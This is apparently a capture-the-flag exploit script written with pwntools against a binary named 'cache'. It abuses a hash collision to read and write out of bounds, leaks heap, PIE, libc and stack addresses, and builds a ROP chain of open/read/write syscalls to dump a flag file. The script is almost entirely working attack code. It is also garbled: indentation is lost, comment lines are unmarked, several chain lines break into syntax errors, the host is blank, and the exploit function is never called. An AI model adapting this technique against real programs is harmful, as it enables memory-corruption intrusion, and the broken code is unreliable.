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Created January 2, 2021 21:06
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from pwn import *
from past.builtins import xrange
from time import sleep
from binascii import hexlify, unhexlify
import random
import subprocess
# utils
def Create(name,size):
global io
io.sendlineafter('> ','1')
io.sendlineafter('Name: ',name)
io.sendlineafter('Size: ',f'{size}')
def Read(name,offset,count):
global io
io.sendlineafter('> ','2')
io.sendlineafter('Name: ',name)
io.sendlineafter('Offset: ',f'{offset}')
io.sendlineafter('Count: ',f'{count}')
return io.recvline().strip()
def Write(name,offset,count,data):
global io
io.sendlineafter('> ','3')
io.sendlineafter('Name: ',name)
io.sendlineafter('Offset: ',f'{offset}')
io.sendlineafter('Count: ',f'{count}')
io.sendafter('Data: ',data)
def Erase(name):
global io
io.sendlineafter('> ','4')
io.sendlineafter('Name: ',name)
# Struct
0x10: nullptr | hash
0x20: vtable | string_data_ptr
0x30: size | nullptr
# Addr
stdout_offset = 0x1ec6a0
environ = 0x1ef2e0
# Gadgets
L_pop_rdi = 0x0015f3bf
L_pop_rsi = 0x001577a1
L_pop_rdx = 0x00162866 #rdx ; rxx ; ret
L_pop_rax = 0x00112cfb
L_syscall = 0x00097e29
# exploit
def Pwn():
global io
# Hash collision
colliding_hash = [p64(0x520f11afb1d6539c),'HKHKHKHKHKHKHKHK']
Create(colliding_hash[1],0x18) #1
Create('AA',0x18) #target
Create(colliding_hash[0],0x508) #0
heap_base = u64(Read(colliding_hash[1],0,0x28)[0x20:])
print(f'Heap: {hex(heap_base)}')
pie_base = u64(Read(colliding_hash[1],0xb0,0x8)) - 0xcc70
print(f'Pie: {hex(pie_base)}')
Write(colliding_hash[1],0xb8,0x8,p64(pie_base + 0xd0c0)) #io stdout
libc_leak = u64(Read('AA',0x0,0x8))
libc_base = libc_leak - stdout_offset
print(f'Libc: {hex(libc_base)}')
Write(colliding_hash[1],0xb8,0x8,p64(libc_base + environ))
stack_leak = u64(Read('AA',0x0,0x8))
print(f'Stack: {hex(stack_leak)}')
Write(colliding_hash[1],0xb8,0x10,p64(stack_leak - 0x110) + p64(0x500))
L_ROP = p64(libc_base + L_pop_rdi)
L_ROP += p64(stack_leak - 0x60)
L_ROP += p64(libc_base + L_pop_rsi)
L_ROP += p64(0)
L_ROP += p64(libc_base + L_pop_rax)
L_ROP += p64(2)
L_ROP += p64(libc_base + L_syscall)
L_ROP += p64(libc_base + L_pop_rdi)
L_ROP += p64(0x3)
L_ROP += p64(libc_base + L_pop_rsi)
L_ROP += p64(heap_base) +\
p64(libc_base + L_pop_rdx) +\
p64(0x100) +\
L_ROP += p64(libc_base + L_pop_rax) +\
L_ROP += p64(libc_base + L_syscall)
L_ROP += p64(libc_base + L_pop_rdi) +\
p64(0x1) +\
p64(libc_base + L_pop_rax) +\
L_ROP += p64(libc_base + L_syscall)
L_ROP += b'/home/cache/flag\0'
if __name__=='__main__':
# io = process('./cache',env={'LD_PRELOAD':'./'})
io = remote('', 27015)
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